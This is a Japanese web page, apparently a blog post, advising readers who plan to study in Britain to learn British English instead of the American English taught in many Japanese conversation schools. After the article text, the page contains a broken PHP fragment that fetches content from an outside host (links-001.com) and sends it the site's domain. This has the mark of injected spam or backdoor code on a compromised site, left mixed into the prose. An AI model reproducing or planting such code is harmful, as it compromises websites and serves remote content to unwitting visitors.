前へ
次へ

イギリス留学をするときのアメリカ英語との違い

日本でも一応学校で英語を学べます。しかし本格的な英語となるとかなり様子が変わるでしょう。人によっては英語圏の人とのコミュニケーションがしっかりできるくらい話せることもあります。しかし多くの人は受験英語の点数は取れてもコミュニケーションを問題なくこなせません。将来海外で仕事がしたい人、外資系で仕事がしたい人、世界的なネット会社で仕事がしたい人もそれなりに英語が話せる必要があるでしょうから、高校など以外でもしっかり英語を学ぶと良いでしょう。コミュニケーション力をつけるなら英語圏に留学するのがよいとされ、人気があるのがイギリス留学です。イギリスといえば英語の中の英語が話されている国であり、イギリス留学に適している大学もたくさんあります。日本からイギリス留学する人も多く、日本の大学から交換留学ができるところもあります。これまであまり海外に行った経験がないのであれば、イギリス留学のサポートをしっかり受けたほうがいいでしょう。イギリス留学をするにあたっては準備が必要で、その中でも大事なのが英語力です。英語は現地で学ぼうとするかもしれませんがイギリス留学で現地の大学に入学するときは授業について行けるだけの英語力が求められます。もちろん大学受験レベルの英語では足りないので、別途勉強が必要でしょう。イギリス留学であれば英語の中でもイギリス英語を学んでおく必要があります。日本の英会話教室ではアメリカ人講師から英会話を学ぶケースがあり、アメリカ英語で英語を身に着けてしまうことがあります。イギリス留学、特にロンドン留学だと正統派のイギリス英語を身に着けたほうが友達などもできやすくなります。アメリカ英語とイギリス英語の違いとしてテンションがあり、イギリスではアメリカのようなはっきりした対応を取らないことが多いです。そのことを知っておくだけでもロンドン留学を成功に導けるでしょう。英会話教室に行くならイギリス人講師についてもらうと良いかもしれません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top